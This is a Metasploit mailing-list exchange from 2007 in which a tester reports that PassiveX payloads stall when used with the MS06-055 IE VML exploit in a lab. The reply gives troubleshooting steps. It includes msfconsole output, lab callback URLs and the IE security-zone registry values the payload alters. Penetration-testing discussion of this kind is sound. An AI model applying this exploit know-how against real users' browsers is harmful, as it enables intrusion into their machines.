[framework] PassiveX-based payloads and MS06-055
mmiller at hick.org
mmiller at hick.org
Tue Mar 13 11:42:32 CDT 2007
On Tue, Mar 13, 2007 at 12:35:27PM +0100, Angelo Dell'Aera wrote:
>
>
> While doing few tests I noticed a strange behavior while trying
> to exploit the VML processing vulnerability in IE referenced by the
> Microsoft Bullettin MS06-055 on Windows XP SP1.
>
...
>
> I see this behavior...
>
>
> msf exploit(ms06_055_vml_method) > exploit
> [*] PassiveX listener started.
> [*] Using URL: http://192.168.33.130:8080/pentest3
> [*] Server started.
> [*] Exploit running as background job.
> msf exploit(ms06_055_vml_method) >
> [*] Sending PassiveX main page to client
>
>
> and it stops here. I tried using other PassiveX-based payloads with
> the same exploit but no luck... always the same result. Other non
> PassiveX-based payloads work instead.
>
> I took a look at the registry and everything seems to work fine since
>
> Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
> Settings\Zones\3
> Values: 1004, 1200, 1201, 1001
>
> are changed to the value 0 as expected.
A few quick things to check:
1) What version of IE is installed on the machine? I'm assuming IE 6,
but just need to be sure.
2) What happens when you manually bring up the PX site after the values
have been successfully altered? In the previous example, you could try
browsing to:
http://192.168.33.130:10000//OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s
There might be some additional information you can collect by doing
'setg LogLevel 3' and then taking a look at ~/.msf3/logs/framework.log.
More information about the framework
mailing list